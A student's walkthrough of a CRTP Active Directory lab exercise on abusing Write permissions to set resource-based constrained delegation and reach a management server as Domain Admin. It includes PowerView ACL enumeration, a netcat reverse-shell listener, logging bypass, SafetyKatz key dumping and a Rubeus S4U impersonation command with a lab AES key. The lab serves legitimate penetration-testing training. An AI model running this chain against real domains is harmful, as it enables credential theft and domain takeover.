CRTP Lab 17

Task 1

Find a computer object in dcorp domain where we have Write permissions.

Use PowerView to enumerate Write permission for a user that we have compromised.

After trying from multiple users or using BloodHound (select ci-admin and select Outbound Object Control), we would know that the user ciadmin has Write permissions on the computer object of dcorp-mgmt:

C:\AD\Tools> Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

PS C:\Users\student372> Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

Since we already had a reverse shell via Jenkins, we can fetch the same on netcat and then check run SBLoggingBypass and PowerView.

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

#Run SBLoggingBypass, PowerView.

Task 2

Abuse the Write permissions to access that computer as Domain Admin.

Since we have GenericWrite on ciadmin and we have a shell as ci-admin, we can to set RBCD on dcorp-mgmt.

Here, first hop is student machine, and second hop is dcorp-mgmt.

PS C:\Users\Administrator\.jenkins\workspace\Project0> Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std372$' -Verbose

Let's check if RBCD is correctly set:

PS C:\Users\Administrator\.jenkins\workspace\Project0> Get-DomainRBCD


SourceName                 : DCORP-MGMT$
SourceType                 : MACHINE_ACCOUNT
SourceSID                  : S-1-5-21-719815819-3726368948-3917688648-1108
SourceAccountControl       : WORKSTATION_TRUST_ACCOUNT
SourceDistinguishedName    : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ServicePrincipalName       : {WSMAN/dcorp-mgmt, WSMAN/dcorp-mgmt.dollarcorp.moneycorp.local, TERMSRV/DCORP-MGMT,
                             TERMSRV/dcorp-mgmt.dollarcorp.moneycorp.local...}
DelegatedName              : DCORP-STD372$
DelegatedType              : MACHINE_ACCOUNT
DelegatedSID               : S-1-5-21-719815819-3726368948-3917688648-13682
DelegatedAccountControl    : WORKSTATION_TRUST_ACCOUNT
DelegatedDistinguishedName : CN=DCORP-STD372,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local

The above output is read as: On dcorp-mgmt, there is a delegation setup that allows dcorp-std372. If we compromise dcorp-std machine, we would be able to access any service on dcorp-mgmt$ machine as any user including DA.

Now, after setting RBCD on dcorp-mgmt from ci-admin, we are allowing the machine account dcorp-std to access any service on the machine dcorp-mgmt as any user or Domain Admin.

Therefore, let's compromise the student machine and get the secrets.

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe - args "sekurlsa::ekeys" "exit"

Which AES key to use?

The one with S-1-5-18 SID since this is the SID for machine account that represents on the domain level.

From a normal cmd from student372, use this hash to abuse RBCD to access dcorp-mgmt as Domain Administrator by using O-PTH.

Here, as dcorp-std$ (first hop), we are accessing HTTP on dcorp-mgmt as the Administrator.

# ArgSplit "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:dcorp-std372$ /aes256:e63b5208ef1a22959561117ec6034f9fd5ba36e00194776af4eea427af5b3da2 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

Since we injected the ticket, we can either use winRS or PSRemoting.

C:\Users\student372>winrs -r:dcorp-mgmt cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator

C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=DCORP-MGMT

C:\Users\Administrator.dcorp>

PreviousResource Based Constrained Delegation (RBCD)NextAcross Trusts

Last updated 1 year ago